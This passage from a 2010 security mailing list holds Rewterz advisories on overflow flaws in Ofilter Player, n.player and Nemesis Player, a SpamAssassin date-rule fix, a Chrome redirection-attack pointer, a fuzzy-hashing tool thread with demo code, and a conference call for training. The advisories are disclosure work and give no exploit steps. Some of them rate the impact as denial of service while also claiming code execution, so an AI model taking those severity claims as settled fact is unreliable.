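    base = bytes(rng.getrandbits(8) for _ in range(8192))
    other = bytes(rng.getrandbits(8) for _ in range(8192))
    patched = base[:4096] + b"INSERTED PAYLOAD 20B" + base[4096:]
    return {"base.bin": base, "base_patched.bin": patched, "unrelated.bin": other}


if __name__ == "__main__":
    samples = constructed_samples()
    sigs = {n: piecewise_hash(d) for n, d in samples.items()}
    for n, s in sigs.items():
        print(f"{n:18} {s}")
    print("base vs patched  :", similarity(sigs["base.bin"], sigs["base_patched.bin"]))
    print("base vs unrelated:", similarity(sigs["base.bin"], sigs["unrelated.bin"]))
    print("clusters:", cluster(samples))
```

The insertion in the middle of the file only disturbs the one or two blocks around it, so the two signatures differ in a handful of characters and score in the nineties, while the unrelated blob scores far below the clustering threshold. This is also why the tool works on bytes regardless of format, and why, as noted in the thread, it says nothing about two binaries that share functionality but not bytes.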






REWTERZ-20100103 - Ofilter Player Local Denial of Service (DoS) Vulnerability

2010-01-05 Thread rewterz security team

Rewterz 05/01/2010

- Ofilter Player Local Denial of Service (DoS) Vulnerability -

1) Affected Software

* Ofilter Player 1.1

NOTE: Other versions may also be affected.



2) Severity

Rating: Low
Impact: Denial of Service
Where: Local



3) Vendor's Description of Software

"Ofilter Player is an easy-to-use multimedia player. It can play many
kinds of audio and video formats such as mp3, wav, midi, avi, VCD,
mpeg etc.

It supports the powerful playback control: play, pause, stop, step,
skip forward, skip backward. It can display and configure all filters'
properties during the playback of the video."

Product Link:
http://www.008soft.com/products/ofilter-player.htm



4) Description of Vulnerability

Rewterz has discovered a vulnerability in Ofilter Player. This
vulnerability could lead to a Denial of Service with the privileges of
the current process or user and cause the application to crash.

This vulnerability exists in the handling of the application skin chosen
by the user. We chose not to provide detailed information about the
location of the vulnerability and how to reproduce it because the author
hasn't confirmed this vulnerability. We can pass a long argument in the
skin file. There is no checking of the length of these inputs. Depending
on the input, this will cause a DoS condition.

We have confirmed the ability to execute our own code.



5) Credits

Discovered by Rehan Ahmed, Rewterz.



6) About Rewterz

Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services.
Our strategy revolves around the need to provide round-the-clock
quality information security services and solutions to our customers.
We maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.

http://www.rewterz.com


Complete list of vulnerability advisories published by Rewterz:

http://rewterz.com/securityadvisories.php





REWTERZ-20100101 - n.player Local Heap Overflow Vulnerability

2010-01-05 Thread rewterz security team


Rewterz 05/01/2010

- n.player Local Heap Overflow Vulnerability -

1) Affected Software

* n.player 1.12.07

NOTE: Other versions may also be affected.


2) Severity

Rating: High
Impact: Denial of Service
Manipulation of Data
Where: Local


3) Vendor's Description of Software

"n.player is a versatile media player that plays audio CDs, DVD, WMA,
MP3, AVI, DiVX and other media with the preinstalled DirectShow
decoder.

n.player also supports enhanced features for playing video and audio.

n.player includes the high-quality audio equalizer, support for divX
subtitles, many functions for video and audio playback and ATI Remote
Wonder controller support."

Product Link:
http://www.softpedia.com/get/Multimedia/Video/Video-Players/nplayer.shtml
http://www.samo.cz



4) Description of Vulnerability

Rewterz has discovered a vulnerability in n.player. This vulnerability
could lead to execution of code with the privileges of the current
process or user.

This vulnerability exists in the handling of the application skin selection
by the user. We chose not to provide detailed information about
the location of the vulnerability and how to reproduce it because the
author hasn't confirmed this vulnerability. We can pass a long argument
with some commands onto the heap. There is no checking of the length of
these inputs. Depending on the input, this will cause an exploitable
condition.

We have confirmed the ability to execute our own code. This is a common
heap overflow vulnerability and can be exploited easily.



5) Credits

Discovered by Rehan Ahmed, Rewterz.



6) About Rewterz

Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services.
Our strategy revolves around the need to provide round-the-clock
quality information security services and solutions to our customers.
We maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.

http://www.rewterz.com


Complete list of vulnerability advisories published by Rewterz:

http://rewterz.com/securityadvisories.php





Re: Y2K10 spamassassin bug, 2010 year mails discared as spam

2010-01-05 Thread Rudy Zijlstra

Eduardo Romero wrote:

Hi,

Please review your spamassassin rules: the FH_DATE_PAST_20XX rule marks
2010 mails as spam with approximately 3.6 points. The possible workarounds are:

.- file /usr/share/spamassassin/72_active.cf

replace :

header   FH_DATE_PAST_20XX  Date =~ /20[1-9][0-9]/ [if-unset: 2006]

by:

header   FH_DATE_PAST_20XX  Date =~ /20[2-9][0-9]/ [if-unset: 2006]


.- add score 0 to this rule at /usr/share/spamassassin/50_scores.cf

replace:
score FH_DATE_PAST_20XX 2.075 3.384 3.554 3.188 # n=2

by:
score FH_DATE_PAST_20XX 0



The 'sa-update' option does not always work for me.

Regards
Edo.
  
The daily update of spamassassin catches this. Mine was already updated 
before I got around to checking it.


Cheers,

Rudy


Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

2010-01-05 Thread Aditya K Sood

Hi

Recently, with the release of the OWASP Top 10 RC1 list of exploited
vulnerabilities, redirection issues have already made their mark there.
Even the WASC has included URL abuse as one of the stringent attacks.
To be fair in this regard, these are not recent attacks but have persisted
for a long time. The only difference is that the exploitation ratio has
increased from bottom to top. That is the prime reason they have been
included in the web application security benchmarks. But the projection
of redirection attacks is active now.

This post is not about explaining the basics of redirection issues. It
is more about the design vulnerabilities in browsers that can lead to
potential persistent redirection vulnerabilities. Web application
security can be hampered by browser problems.

Note: The aim is to project the implications of browser inefficiency
and the ease of conducting web application attacks.

Post:
http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html

Video: http://www.secniche.org/videos/google_chrome_link_inj.html

Browsers need to take care of these issues.

Regards
Aditya K Sood
http://www.secniche.org


REWTERZ-20100102 - Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability

2010-01-05 Thread rewterz security team

Rewterz 05/01/2010

- Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability -

1) Affected Software

* NSP 2.0
* NSP 1.1 Beta



2) Severity

Rating: High
Impact: Denial of Service
Where: Local



3) Vendor's Description of Software

"The Nemesis Player (NSP) is much more than any other media player.
It allows you to watch your video files collection like any player
but also enables you to emulate a "DVD menu" for your videos.

Nsp can be broken down into 3 parts: Scene Editing, Project Settings
and the player itself."

Product Link:
http://www.nsplayer.org



4) Description of Vulnerability

Rewterz has discovered a vulnerability in Nemesis Player (NSP). This
vulnerability could lead to a Denial of Service with the privileges of
the current process or user and cause the system to stop responding.

This vulnerability exists in the handling of Nsp project files. We chose
not to provide detailed information about the location of the
vulnerability and how to reproduce it because the author hasn't
confirmed this vulnerability. We can pass a long argument in the Nsp
project file. There is no checking of the length of these inputs.
Depending on the input, this will cause a DoS condition.

We have confirmed the ability to execute our own code.



5) Credits

Discovered by Rehan Ahmed, Rewterz.



6) About Rewterz

Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services.
Our strategy revolves around the need to provide round-the-clock
quality information security services and solutions to our customers.
We maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.

http://www.rewterz.com


Complete list of vulnerability advisories published by Rewterz:

http://rewterz.com/securityadvisories.php





Re: [Full-disclosure] [Tool] DeepToad 1.1.0

2010-01-05 Thread T Biehn
I can see what you're saying, it could be useful for finding
differences in different versions of the same binary but from what I
can see Joxean's app is meant to group files of the same 'type,' not
provide 'diff' capabilities.

-Travis

On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky  wrote:
> I looked into a fair amount of this sort of normalization back when I was
> playing with dotplots.  The idea was to upgrade from simple Levenshtein
> string comparison (with no knowledge of variable length x86 instructions,
> pointers that shift from compile to compile, etc) to something with at least
> some domain specific knowledge.  What I found, somewhat surprisingly, was
> that dumb string comparison was more than enough.  In fact, when I compared
> pre-patch and post-patch builds, it was easy to directly see when content
> was added, removed, shifted in location, etc.  Joxean's going to have much
> the same result -- as basic as his similarity metric is, he'll get the broad
> strokes just fine.
>
> Ultimately the best approach is to build a graph of how functions interact
> and measure graph isomorphism, but of course Halvar figured that out years
> ago :)
>
> On Tue, Jan 5, 2010 at 3:41 PM, T Biehn  wrote:
>>
>> Hmm,
>> Wouldn't it be more useful to the sec community to have an algorithm
>> that abstracts at the -interpreted- content level? That is when
>> analyzing binaries I wouldn't think that this would classify two with
>> near identical functionality together, even though it is removing a
>> significant chunk of information during the hash pass.
>>
>> I would largely assume that your algorithm, as is, works best on
>> uncompressed bitmaps. Is there something I'm missing?
>>
>> -Travis
>>
>> On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret  wrote:
>> > Hi all,
>> >
>> > I'm happy to announce the very first public release of the open source
>> > project DeepToad, a tool for computing fuzzy hashes from files.
>> >
>> > DeepToad can generate signatures, clusterize files and/or directories
>> > and compare them. It's inspired in the very good tool ssdeep [1] and, in
>> > fact, both projects are very similar.
>> >
>> > The complete project is written in pure python and is distributed under
>> > the LGPL license [2].
>> >
>> > Links:
>> > Project's Web Page http://code.google.com/p/deeptoad/
>> > Download Web Page http://code.google.com/p/deeptoad/downloads/list
>> > Wiki http://code.google.com/p/deeptoad/w/list
>> >
>> > References:
>> > [1] http://ssdeep.sourceforge.net/
>> > [2] http://www.gnu.org/licenses/lgpl.html
>> >
>> > Regards && Happy new year!
>> > Joxean Koret
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da


SyScan'10 Call For Training (CFT)

2010-01-05 Thread organi...@syscan.org
apologies for the multiple copies.

SyScan'10 CALL FOR TRAINING

ABOUT SYSCAN'10
This year, SyScan'10 will be held in the 4 exciting cities of Singapore, 
Shanghai, Taipei and Ho Chi Minh City (Vietnam). Details are as follows:

SyScan'10 Singapore
date: 15 - 18 June 2010

SyScan'10 Shanghai
date: 8 - 11 July 2010

SyScan'10 Taipei
date: 19 - 22 August 2010

SyScan'10 Ho Chi Minh City (Vietnam)
date: 23 - 26 September 2010

TRAINING TOPICS
SyScan’10 training topics will focus on the following areas:

Web Applications
Networks
Securing Windows/Linux Systems
Databases
Storage
Secure Programming/Development
Cloud Computing
Virtualization
Malware Analysis
Penetration Testing
Exploit Development
Reverse Code Engineering
Languages (Assembly, Python, Ruby etc)

PRIVILEGES
Trainers’ Privileges:
• 50% of net profit of class.
• Complimentary entry to SyScan'10 conference
• Trainers/Speakers Dinner on conference days
• After-conference party.
• A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the difference 
between the total fee collected for each class and the total expenses incurred 
for each class. The expenses of each class would include the return economy 
air-ticket of the trainer, 3 nights of accommodation (training) and the rental 
of the training venue.


*CFT SUBMISSION*
CFT submission must include the following information:

1) Brief biography including list of publications and papers published
previously or training classes conducted previously.
2) Training title.
3) Training introduction/description.
4) Student Prerequisite.
5) Software Requirements.
6) Hardware Requirements.
7) Course Outline (daily basis).
8) Contact Information (full name, alias, handler, e-mail, postal address, 
phone, fax, photo, country of origin, special dietary requirement).
9) Employment and/or affiliations information.
10) Any significant educational/training experience/background.
11) Why is your material different or innovative or significant or an important 
tutorial?

Training classes will be 2 full days (0900 hours - 1700 hours). Please inform 
the CFP committee if your class is shorter or longer than 2 days during your 
CFT submission.

All submissions must be in English and in PDF format only. The more information 
you provide, the better the chance for selection. Please send submission to 
c...@syscan.org.


*IMPORTANT DATES *
Final CFT Submission – 28th February 2010.

*OTHER INFORMATION *
Please feel free to visit SyScan website to get a feel what this conference is 
all about – SHARE AND HAVE FUN!

By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd. the 
rights to reproduce, distribute, advertise and show your presentation including 
but not limited to http://www.syscan.org, printed and/or electronic 
advertisements, and all other mediums.

-- 
Thank you
Thomas Lim
Organiser
SyScan'10
www.syscan.org